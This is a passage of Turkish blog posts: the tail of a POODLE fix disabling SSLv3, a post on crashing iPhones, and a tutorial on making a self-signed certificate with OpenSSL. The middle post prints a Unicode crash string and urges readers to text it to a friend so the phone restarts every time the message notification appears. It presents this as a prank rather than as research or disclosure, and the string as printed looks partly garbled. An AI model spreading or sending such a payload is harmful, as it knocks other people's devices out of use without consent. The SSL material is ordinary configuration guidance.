ssl.use-sslv3 = "disable"

Apache

SSLProtocol All -SSLv2

Yukarıdaki ayarlar yapıldığı taktirde sistemde Poodle açığı dediğimiz açık kalmayacak hala bu açıkdan etkilenen sistemler mevcut ise yukarıdaki ayarları yapabilirler…

SMS ile arkadaşınızın iPhone’unu resetleyin

Yanlış duymadınız bugün public edilen bir bug ile uzaktan arkadaşınızın telefonunu yeniden başlatabilirsiniz.Yapmanız gereken tek şey ise aşağıdaki kod ile herhangi bir platformdan mesaj atmak Whatsapp olur Telegram olur yada normal SMS olabilir.Benden size tavsiye direk olarak SMS şeklinde atmanız.Her mesajlarına girdiğinde telefon yeniden başlayacaktır.Kurtulmanın tek yoluda tüm mesajları silmek.

Kodumuz

effective.
Power
لُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ
冗

Bu teknik ile karşıdaki kişinin mesajı açmasına gerek bile yok bildirim olarak gördüğü anda telefon otomatik olarak yeniden başlıyor.Bu Açık yada hata ne dersiniz bilemem ne zaman giderilir bilinmez ancak şuanda Neredeyse tüm İOS modellerinde çalışıyor.

OpenSSL ile Kendinden İmzalı SSL Oluşturma

OpenSSL Açık kaynak kodlu SSL ve TLS protokolleri için geliştirilmiş bir uygulamalar. Son zamanlarda adı pekde iyi anılmasada OpenSSL şu an için bu protokolde kullanabileceğimiz neredeyse tek uygulama bugün ise bu OpenSSL ile sizlere kendinden imzalı yani Self-Signed sertifika oluşturmayı göstereceğim.

Sitenizin kullanıcılara gösterilen yerinde kullanmamanızı öneririm kullanıcılar için sıkıntılar oluşturabilir bunun dışında admin paneli yada sitenizin içerisindeki farklı işlevlerde kullanabilirsiniz.

OpenSSL Değilse kurulumu gerçekleştiriyoruz hemen

sudo su
apt-get install openssl

Şimdi yapacağımız şey kullanılacak olan SSL için özel şifreyi üretmek bunun için

openssl genrsa -des3 -out test.key 2048

Anahtarı 2048 olarak üretiyoruz gördüğünüz gibi bunu 1024 olarakda oluşturabilirsiniz tek yapmanız gereken 2048 yazan yeri 1024 ile değiştirmek olacak

Sıra geldi CSR oluşturmaya bunuda aşağıdaki ufak bir kod yardımı ile kolaylıkla oluşturabilirsiniz.

openssl req -new -key test.key -out test.csr

Sizden bir takım bilgiler isteyecek doğru bir şekilde girişini yapıyorsunuz. Kendinden imzalı olacağı için onaylatmak için bir firmaya gerek yok haliyle ücret ödemeyeceksinizde ancak geçerliliği tam olmayacak yukarıdaki aşamadan sonra sertifikayı onaylamak için ise

openssl x509 -req -days 365 -in test.csr -signkey test.key -out test.crt

Son olarak PEM oluşturmamız gerekiyor yeni güvenlik yöntemleri ve doğrulama şekli olarak kullanılacağı için oluşturulması zor değil aşağıdaki komut ile oluşturabilirsiniz.

cat test.key test.crt > test.pem

Bu son aşamadan sonrada sertifikanızı oluşturdunuz güle güle kullanabilirsiniz. Sisteminizin hızına göre sertifikanın oluşumu 1 dk alabilir teleşlanmayın yada daha uzun sürebilir.